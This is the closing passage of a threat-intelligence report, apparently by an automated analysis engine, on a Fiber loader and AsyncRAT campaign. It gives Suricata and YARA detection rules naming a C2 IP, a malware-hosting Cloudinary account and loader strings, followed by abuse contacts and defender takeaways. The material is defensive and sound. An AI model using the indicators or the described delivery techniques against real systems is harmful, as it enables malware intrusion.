    msg:"BGI - Fiber Loader Stage 3 Download (img_230249.png)";
    flow:established,to_server;
    content:"/img_230249.png"; http_uri;
    reference:url,intel.breakglass.tech;
    classtype:trojan-activity;
    sid:9000100; rev:1;
)

alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - Cloudinary Steganographic Payload (dn6bpc2yo account)";
    flow:established,to_server;
    content:"res.cloudinary.com"; http_host;
    content:"/dn6bpc2yo/"; http_uri;
    reference:url,intel.breakglass.tech;
    classtype:trojan-activity;
    sid:9000101; rev:1;
)

# Matches any request whose Host header is the C2 IP. The IN-/INICIO markers live in the
# response body, not the request, so they are not matched by this rule.
alert http $HOME_NET any -> $EXTERNAL_NET any (
    msg:"BGI - HTTP Request to AsyncRAT C2 / Stage 3 Server (91.92.242.219)";
    flow:established,to_server;
    content:"91.92.242.219"; http_host;
    reference:url,intel.breakglass.tech;
    classtype:trojan-activity;
    sid:9000102; rev:1;
)

YARA Rule

rule Fiber_Loader_HackForums_Gigajew {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-16"
        description = "Detects the Fiber .NET loader with HackForums.gigajew namespace"
        hash = "240068f98bd3e3213351ebdac3a0e9657f9a17506e43425ea3ed19f14e17cf21"
        tlp = "WHITE"
        reference = "https://intel.breakglass.tech"

    strings:
        $ns1 = "HackForums.gigajew" ascii wide
        $ns2 = "Fiber.Program" ascii wide
        $vm1 = "VirtualMachineDetector" ascii wide
        $vm2 = "BiosCharacteristics" ascii wide
        $sched = "Microsoft.Win32.TaskScheduler" ascii wide
        $flag = "flagRegStartup" ascii wide

    condition:
        uint16(0) == 0x5A4D and
        filesize < 5MB and
        $ns1 and
        2 of ($ns2, $vm1, $vm2, $sched, $flag)
}

rule AsyncRAT_Stego_Dropper_JScript {
    meta:
        author = "GHOST - Breakglass Intelligence"
        date = "2026-03-16"
        description = "Detects JScript dropper using Altissimo/ranki obfuscation pattern"
        hash = "57c5c7a34d11c1135ab38c3612030377345685347f49c1b2a626106cbe4385bd"
        tlp = "WHITE"
        reference = "https://intel.breakglass.tech"

    strings:
        $junk = "this.raingear" ascii
        $delim1 = "Altissimo" ascii
        $delim2 = "ranki" ascii
        $wmi = "winmgmts" ascii
        $proc = "Win32_Process" ascii

    condition:
        filesize < 100KB and
        all of them
}

Abuse Reporting

  • Cloudinary: Report account dn6bpc2yo as hosting malware payloads to security@cloudinary.com. Provide the full URL and SHA256 of the decoded payload. Cloudinary has historically been responsive to abuse reports.
  • Omegatech: abuse@omegatech[.]sc -- this is bulletproof hosting. Expect no response. Document the report for your records.
  • RIPE NCC: Contact CA12141-RIPE (abuse contact for 91.92.242.0/24). RIPE can escalate to the upstream transit provider (NTT/AS2914) if the LIR is non-responsive.
  • NTT (AS2914): As the upstream transit provider, NTT can null-route the prefix if Omegatech refuses to act. Contact NTT's abuse team with evidence.

So What? Takeaways for Defenders

If you work in manufacturing, engineering, or procurement, this campaign is targeting you specifically. The lure document references "met-tech pricing request" and "product specifications" -- language designed to blend into the daily email flow of someone who handles vendor quotes and technical drawings. Train your teams that a .js attachment is never a legitimate quote document.

If you allow Cloudinary traffic unmonitored, you have a blind spot. This campaign demonstrates that legitimate CDN services are actively being weaponized for payload delivery. The fix is not to block Cloudinary entirely -- that would break countless legitimate websites. The fix is to inspect the content: monitor for unusually large image downloads, alert on Cloudinary URLs in PowerShell download cradles, and consider SSL inspection for high-risk user populations.

If you are not monitoring CasPol.exe execution, add it to your LOLBIN watchlist immediately. CasPol is a .NET Framework utility with no legitimate use in modern enterprise environments. Any execution of CasPol that loads an assembly or spawns a child process is almost certainly malicious.

If you rely solely on IP/domain blocklists, you are losing this fight. Stage 1 of this chain downloads from res.cloudinary.com -- a domain you cannot block. Stage 3 downloads from a bare IP over HTTP -- trivially rotatable. Behavioral detection (WMI process creation, hidden PowerShell, CasPol abuse, steganographic marker patterns) is more durable than IOC-based blocking.

The broader pattern: a HackForums-level actor is running multi-stage, CDN-abusing, steganography-based infection chains with dual persistence and AES-encrypted C2. This is not nation-state sophistication, but it is well beyond "script kiddie." The crimeware ecosystem continues to raise the bar, and defenders who dismiss HackForums operators as unsophisticated are underestimating the threat.


This investigation was conducted by GHOST, Breakglass Intelligence's automated threat analysis engine. IOCs, YARA rules, and Suricata signatures from this report are available for download. If you have additional samples or infrastructure tied to the gigajew actor or the Fiber loader, contact us.

Breakglass Intelligence -- intel.breakglass.tech
